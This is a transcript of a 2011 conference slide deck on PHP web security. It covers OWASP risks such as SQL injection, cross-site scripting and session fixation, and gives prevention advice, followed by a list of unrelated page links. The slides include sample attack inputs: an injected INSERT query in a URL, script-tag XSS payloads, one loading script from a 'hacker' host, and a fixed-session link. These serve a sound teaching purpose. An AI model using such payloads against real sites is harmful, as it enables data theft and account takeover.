Phpnw security-20111009

Paul Lemon PHPNW 11 – Notes from the trenches

feelin

Paul Lemon PHPNW 11 – Notes from the trenchesPaul Lemon PHPNW 11 – Notes from the trenchesPaul Lemon PHPNW 11 – Notes from the trenches

Are you feeling secure – notes from the trenches

Paul Lemon @anthonylime

http://joind.in/3603

feelin

Introduction

- I am a web developer and have been for 13 years- Former sound engineer to the obscure and poor- Technical Director at MadeByPi- I love what I do - PHP / Java / Actionscript / Javascript / C#- Wear a mean hairnet

About me

feelin

“The problem of insecure software is perhaps the most important technical challenge of our time.” – OWASP Testing Guide Introduction.

Photo courtesy http://www.flickr.com/photos/katescars/

feelin

Introduction

- Notes based on personal professional experience- Over 20+ third party tests on our applications- Development orientated- Simple code examples – not production code.

This presentation

feelin

Introduction

Open Web Application Security Project

Best resource for developers / analysts / testers

https://www.owasp.org/

feelin

Introduction

SQL Injection

Cross-Site Scripting (XSS)

Broken Authentication and Session Management

Insecure Direct Object References

Cross-Site Request Forgery (CSRF)

Security Misconfiguration

Insecure Cryptographic Storage

Failure to Restrict URL Access

Insufficient Transport Layer Protection

Unvalidated Redirects and Forwards

OWASP Top 10

feelin

Introduction

SQL Injection

Cross-Site Scripting (XSS)

Broken Authentication and Session Management

Insecure Direct Object References

Cross-Site Request Forgery (CSRF)

Security Misconfiguration

Insecure Cryptographic Storage

Failure to Restrict URL Access

Insufficient Transport Layer Protection

Unvalidated Redirects and Forwards

OWASP Top 10

feelin

SQL Injection

http://www.flickr.com/photos/andresrueda/2983149263/

feelin

Injection

http://xkcd.com/327/

feelin

Injection

http://someserver/script.php?id=1;INSERT INTO members ('email','passwd','login_id','full_name')VALUES ('paul.lemon@gmail.com','hello',‘paul',’Paul Lemon');

Sample Code

feelin

Injection

- Confidential data can be disclosed

The results of the query may not visible in the HTML

- Trial and error to iterate data in tables

- Execute long running queries

- Test for errors in page execution

- Vulnerable to inserts / updates / defacement

How is it exploited

feelin

Injection

Validation and Parameterised Query

feelin

Injection

- Validate all input. - Use PDO to create parameterised queries or- Use a ORM or Database Library (not your own!)- Set up your database permissions.- Don’t expose your queries (logging etc)- Code review- Don’t be complacent

How to prevent

feelin

Injection

- Validation is not just for the user’s benefit- Cast to correct type i.e. intval / floatval / boolean- Whitelist Input ranges - Reasonable minimums and maximums- Whitelist with regular expression- Blacklist with regular expression- Validate Email / Urls - Don’t rely on your model layer

A quick note about validation

feelin

http://www.flickr.com/photos/andresrueda/2983149263/

feelin

http://someserver/script.php?name=<script>alert();</script>orhttp://bit.ly/lYMcHjkj

Sample XSS

feelin

http://host/script.php?name=<script src='http://hacker/script.js' />

Sample XSS

feelin

Potential Exploits

- Theft of session cookies- Insertion of content / forms etc- Redirection to malicious sites- Insertion of trojan downloads / keyloggers etc.

feelin

Varieties of XSS

• Persistent - data is stored in the database• Nonpersistent - injected code is present in the URL/Request• DOM Based - javascript executed in the page reads the request

feelin

Web application

Trusted Not Trusted

Browser

• Posted Form• Querystring• Url• Cookies• HTTP Headers

feelin

XSS – Trust zones

Web application

Trusted Not Trusted

APIAPI

• Use HTTPS•Treat as user input

feelin

XSS – Trust zones

Web application

Trusted Not Trusted

Database

• Database may have been compromised• Validation may have failed• Escape all output

feelin

XSS – Trust zones

Web application

Trusted Not Trusted

Browser

APIAPI

Database

feelin

XSS – Trust zones

Web application

Trusted Not Trusted

Browser

APIAPI

Database

Your application should be modular too

feelin

Escape all output

- ENT_QUOTES option is important – double and single quotes- Page encoding is important- If you need HTML output use HTML Purifier

feelin

Escape all output – context is important

feelin

?name=<script>alert("hello");</script>&link=javascript:alert('hello')

feelin

?name=<script>alert("hello");</script>&link=javascript:alert('hello')

feelin

- Check your templating engine for XSS protection (options in Symfony 1/ Twig for escaping by default)

- Context is important to the escaping used - Image and Hyperlinks- Javascript blocks- CSS

- There is not a definitive solution for PHP- https://www.owasp.org/index.php/ESAPI#tab=PHP

Preventing XSS

feelin

Session cookie to use HTTPOnly in php.ini

- Or use PHP function session_set_cookie_params

Cookies set as HTTPOnly

feelin

Session Exploits

feelin

Session Exploits

- Session Fixation

- Man in the middle attacks

Overview

feelin

Session Exploits

Allowing the session id to be passed on the querystring

Url is sent via email to potential victim

visit this url to the site http://localhost/?sessionid=1234

Victim logs in and this is attached to the session id

Sender uses the original session id and gains access

http://localhost/viewprofile?sessionid=1234

Session Fixation

feelin

Session Exploits

Do not allow session id to be passed on the querystring

Session Fixation – How to prevent

feelin

Session Exploits

Where the attacker has access to the machine

- First user notes down the session id on the computer

- Second user logs in and this is attached to the session id

- First user uses the original session id and gains access

Session Fixation

feelin

Session Exploits

- Roll the session id when a user logs in

You can change the session id more frequently…

Session Fixation – How to prevent

feelin

Session Exploits

Man in the middle attacks

Web applicationUsername / Password

User logs in…

Session Id - Cookie

HTTP POST

feelin

Session Exploits

User logs in…

Session Id - Cookie

HTTP POST

feelin

Session Exploits

User logs in…

Session Id - Cookie

HTTPS POST

feelin

Session Exploits

- Login and authentication must always be over HTTPS- Passwords are personal and confidential- Users are not disciplined- (Store your passwords securely SHA1 / Salt )

feelin

Session Exploits

User logs in…

Session Id - Cookie

HTTPS POST

Web application

User visits a non-secure page

Resource downloaded

HTTP GET

Session Id - Cookie

feelin

Session Exploits

User logs in…

Session Id - Cookie

HTTPS POST

Web application

Resource downloaded

HTTP GET

Session Id - Cookie

feelin

Session Exploits

- Authenticated session cookies should be delivered over SSL- Use HTTPS only option on session cookie- Use a separate domain if you can e.g. https://admin.yoursite/- Use a separate path for your session cookie

feelin

Session Exploits

feelin

Session Exploits

feelin

Session Exploits

User logs in…

Session Id - Cookie

HTTPS POST

Web application

Resource downloaded

HTTP GET

feelin

Session Exploits

User logs in…

Session Id - Cookie

HTTPS POST

Web application

Resource downloaded

HTTP GET

Curses!

feelin

Session Exploits

- Sometimes you cannot limit session to HTTPS- Users can log in and see non-secure data in public pages- There are still secure areas of the site- Use two cookies- Or make the user login again

feelin

Session Exploits

Web application

Username / PasswordUser logs in…

Session Id – Cookie SECURE

HTTPS POST

Open Zone ofWeb application

Resource downloaded

HTTP GET

Session Id

Extra Auth – Cookie SECURE

feelin

Session Exploits

Web application

Username / PasswordUser logs in…

Session Id – Cookie SECURE

HTTPS POST

Secure Zone ofWeb application

Response

HTTPS GET/POST/PUT

Session Id

Extra Auth – Cookie SECURE

Extra Auth – Cookie

feelin

XSRF – Sorry no time

feelin

Conclusions

feelin

Conclusions

Get someone else to do the work

feelin

Conclusions

- Use a framework. I like symfony.- Use a well supported platform / CMS - Check their response to security issues- If there is no solution – check again (and again)

Get someone else to do the work

feelin

Conclusions

- Expect there to be faults – test as much as you can.- Expect there to be attacks – monitor your site- Stay on top of your versions – PHP / MySQL etc- Input validation is critical- Code for quality / Unit tests / regression- Code review- Operate with least privilege- Establish a build and deployment script- Read OWASP

Recommendations

feelin

• XSS cheatlist: http://ha.ckers.org/xss.html• OWASP:

https://www.owasp.org/index.php/Main_Page • HTML Purifier: http://htmlpurifier.org/• Context aware templates:

http://googleonlinesecurity.blogspot.com/2009/03/reducing-xss-by-way-of-automatic.html

• MadeByPi: http://www.madebypi.co.uk

Conclusions

Resources

feelin

Are you feeling secure – notes from the trenches

Paul Lemon @anthonylime – paul.lemon@gmail.com

http://joind.in/3603

Phpnw security-20111009

Technology

Transcript of Phpnw security-20111009

Remote Filtering - Web Security, Email Security, Data Security

General Security Principles and Practices. Security Principles Common Security Principles Security Policies Security Administration Physical Security.

Security Target IBM Internet Security Systems GX6116 Security

Hardware Security Attacks Security Architecture Hardware Security.

Your code are my tests - PHPNW Manchester 2014

Network Security - Norbert Pohlmann · Security Infrastructure Mobile/Desktop Security Network Security E-Commerce Enabler Internet Security Network Security Secure Communication

Wireless and Mobile Security Lesson Introduction ●WiFi security ●iOS security ●Android security.

PHPNW 2010 - Developing Easily Deployable PHP Applications

+ Security Concerns Chapter 10.1. + Security types Physical security Access security Database security.

HyHy---Security Security Security Gate Operators Gate ... · HyHy---Security Security Security Gate Operators Gate Operators ... and performance of this expertly engineered machine.

Modelling by Example Workshop - PHPNW 2016

Corporate Security Service – Security Guard Provider – Security Service:

SECURITY INFRASTRUCTURE SECURITY

Buy the security standards you need shop.bsigroup.com/security Standards Brochure.pdf · Security standards shop.bsigroup.com/security BSI’s Security standards Welcome to our security

Evolución Fortinet Security Fabric · Network Security Network Security Cloud & Apps Security Multi-Cloud Security Open API Fabric Connectors Infrastructure Security Endpoint Protection

HKC Security Installer - HKC Security - HKC Security

SingleRAN Network Solution for IAM 20111009 VF.pdf

THEME Name Surname, Company Twitter handle (17).pdf · Cyber Security Information Security IT Security Physical Security IoT Security OT Security Smart Grid Security Network Perimeter

Getting Started - Web Security, Email Security, Data Security

Embracing growth, social economic transformation for Uganda’s prosperityclassified.japantimes.com/nationalday/pdfs/20111009... · 2014-05-07 · to the community of Ugandans living